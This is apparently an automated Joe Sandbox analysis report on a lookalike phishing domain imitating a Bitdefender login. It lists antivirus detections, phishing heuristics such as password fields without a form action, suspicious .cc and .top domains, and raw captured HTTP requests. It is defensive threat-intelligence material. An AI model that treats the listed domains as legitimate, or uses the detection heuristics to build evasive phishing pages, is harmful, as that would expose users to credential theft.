Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://www.bitdefenderlogin.com/

Overview

General Information

Sample URL:http://www.bitdefenderlogin.com/
Analysis ID:1454314
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Performs DNS queries to domains with low reputation
Connects to several IPs in different countries
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden URLs or javascript code
HTML title does not match URL
HTTP GET or POST without a user agent
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 5740 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1964,i,8097275639217116545,5346654218420662378,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.bitdefenderlogin.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://www.bitdefenderlogin.com/Avira URL Cloud: detection malicious, Label: phishing
Source: https://x551005.com/ftl/commonPage/images/partner/partner-hongtu-white.pngAvira URL Cloud: Label: malware
Source: http://www.bitdefenderlogin.com/Virustotal: Detection: 8%Perma Link
Source: https://hg679.cc/default.html#/HTTP Parser: Number of links: 0
Source: https://wns732.cc/default.html#/HTTP Parser: Number of links: 0
Source: https://js326.cc/default.html#/HTTP Parser: Number of links: 0
Source: https://yh8613.cc/default.html#/HTTP Parser: Number of links: 0
Source: https://xpj723.cc/default.html#/HTTP Parser: Number of links: 0
Source: https://hg679.cc/default.html#/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://wns732.cc/default.html#/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://js326.cc/default.html#/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://yh8613.cc/default.html#/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://xpj723.cc/default.html#/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://js326.cc/default.html#/HTTP Parser: Total embedded image size: 254816
Source: https://xpj723.cc/default.html#/HTTP Parser: Total embedded image size: 3010704
Source: https://hg679.cc/default.html#/HTTP Parser: Base64 decoded: :tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/"> <xmp:CreatorTool>Adobe Photoshop CC 2017 (Windows)</xmp:CreatorTool> <xmp:CreateDate>2021-03-15T14:10:38+08:00</xmp:CreateDate> <xmp:M...
Source: https://hg679.cc/default.html#/HTTP Parser: Title: does not match URL
Source: https://wns732.cc/default.html#/HTTP Parser: Title: does not match URL
Source: https://js326.cc/default.html#/HTTP Parser: Title: does not match URL
Source: https://yh8613.cc/default.html#/HTTP Parser: Title: does not match URL
Source: https://xpj723.cc/default.html#/HTTP Parser: Title: does not match URL
Source: https://hg679.cc/default.html#/HTTP Parser: <input type="password" .../> found
Source: https://wns732.cc/default.html#/HTTP Parser: <input type="password" .../> found
Source: https://js326.cc/default.html#/HTTP Parser: <input type="password" .../> found
Source: https://yh8613.cc/default.html#/HTTP Parser: <input type="password" .../> found
Source: https://xpj723.cc/default.html#/HTTP Parser: <input type="password" .../> found
Source: http://www.bitdefenderlogin.com/home.phpHTTP Parser: No favicon
Source: http://www.bitdefenderlogin.com/home.phpHTTP Parser: No favicon
Source: https://x551005.com/HTTP Parser: No favicon
Source: https://hg679.cc/HTTP Parser: No favicon
Source: https://e933002.com/HTTP Parser: No favicon
Source: https://hg679.cc/default.htmlHTTP Parser: No favicon
Source: https://hg679.cc/default.htmlHTTP Parser: No favicon
Source: https://hg679.cc/default.htmlHTTP Parser: No favicon
Source: https://xpj723.cc/default.htmlHTTP Parser: No favicon
Source: https://xpj723.cc/default.htmlHTTP Parser: No favicon
Source: https://wns732.cc/default.htmlHTTP Parser: No favicon
Source: https://yh8613.cc/default.htmlHTTP Parser: No favicon
Source: https://js326.cc/default.htmlHTTP Parser: No favicon
Source: https://js326.cc/default.html#/HTTP Parser: No favicon
Source: https://js326.cc/default.html#/HTTP Parser: No favicon
Source: https://js326.cc/default.html#/HTTP Parser: No favicon
Source: https://43370d.top/HTTP Parser: No favicon
Source: https://43370d.top/HTTP Parser: No favicon
Source: https://f21714.com/HTTP Parser: No favicon
Source: https://f21714.com/HTTP Parser: No favicon
Source: https://d399221.top/HTTP Parser: No favicon
Source: https://t2391.cc/default.htmlHTTP Parser: No favicon
Source: https://856217.cc/default.htmlHTTP Parser: No favicon
Source: https://hg679.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://hg679.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://wns732.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://wns732.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://js326.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://js326.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://yh8613.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://yh8613.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://xpj723.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://xpj723.cc/default.html#/HTTP Parser: No <meta name="author".. found
Source: https://hg679.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://hg679.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://wns732.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://wns732.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://js326.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://js326.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://yh8613.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://yh8613.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://xpj723.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: https://xpj723.cc/default.html#/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.53.114.19:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.53.114.19:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.201.120.160:443 -> 192.168.2.5:51303 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.150.37.130:443 -> 192.168.2.5:51548 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.150.37.130:443 -> 192.168.2.5:51844 version: TLS 1.2

Networking

barindex
Source: global trafficTCP traffic: 163.171.137.177 ports 1186,1,1986,1586,6,8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: brhrjf.yuhu06.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: brhrjf.yuhu06.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: brhrjf.yuhu06.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: brhrjf.yuhu06.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: brhrjf.yuhu06.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: brhrjf.yuhu06.xyz
Source: unknownNetwork traffic detected: IP country count 11
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownTCP traffic detected without corresponding DNS query: 23.53.114.19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /nlp/index.php?keyword=%E6%89%93%E9%B1%BC%E6%AD%A3%E8%A7%84%E5%B9%B3%E5%8F%B0%E5%8F%AF%E6%8F%90%E7%8E%B0-%E4%B8%AD%E5%9B%BD%E6%9C%89%E9%99%90%E5%88%86%E5%85%AC%E5%8F%B8&from=pc&originUrl=http%3A%2F%2Fwww.bitdefenderlogin.com%2Fhome.php&referer=&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&v=1530 HTTP/1.1Host: www.698jbwad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: http://www.bitdefenderlogin.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /19924419.js HTTP/1.1Host: js.users.51.laConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /21771885.js HTTP/1.1Host: js.users.51.laConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/8dcea646973bbe2dc76974436b50c144.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/5a3c598b993dd0d99c3e7a68e0323f3b.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/0c3fb40c0b1b142849b7f16af333a5f2.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/75ed306959762b001a7fe2fe495a77eb.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/b05d090cc7736039c7941cc2c76c6fcc.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/94c3b0fa5cb4f8bbeb3618f9358d7414.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nlp/index.php?keyword=%E6%89%93%E9%B1%BC%E6%AD%A3%E8%A7%84%E5%B9%B3%E5%8F%B0%E5%8F%AF%E6%8F%90%E7%8E%B0-%E4%B8%AD%E5%9B%BD%E6%9C%89%E9%99%90%E5%88%86%E5%85%AC%E5%8F%B8&from=pc&originUrl=http%3A%2F%2Fwww.bitdefenderlogin.com%2Fhome.php&referer=&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&v=1530 HTTP/1.1Host: www.698jbwad.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/76e03c9fd7b7420306571ee61698b7ce.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/8dcea646973bbe2dc76974436b50c144.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/75ed306959762b001a7fe2fe495a77eb.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/0d303c466e9780aea6baef1054bb361c.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/0c3fb40c0b1b142849b7f16af333a5f2.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/94b22146fe6859b39e2c8cd7b28f3134.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/94c3b0fa5cb4f8bbeb3618f9358d7414.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/1fca8c8f6e46d22afdc2c135ec9cac1d.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/d88fe311d70531966d7d8cfbf0e4c955.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/hg128-526.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/76e03c9fd7b7420306571ee61698b7ce.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/b05d090cc7736039c7941cc2c76c6fcc.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/5a3c598b993dd0d99c3e7a68e0323f3b.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/zuobian.gif HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/a8b0a829b0971449e9e3a884cb637e9a.png HTTP/1.1Host: www.image110.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
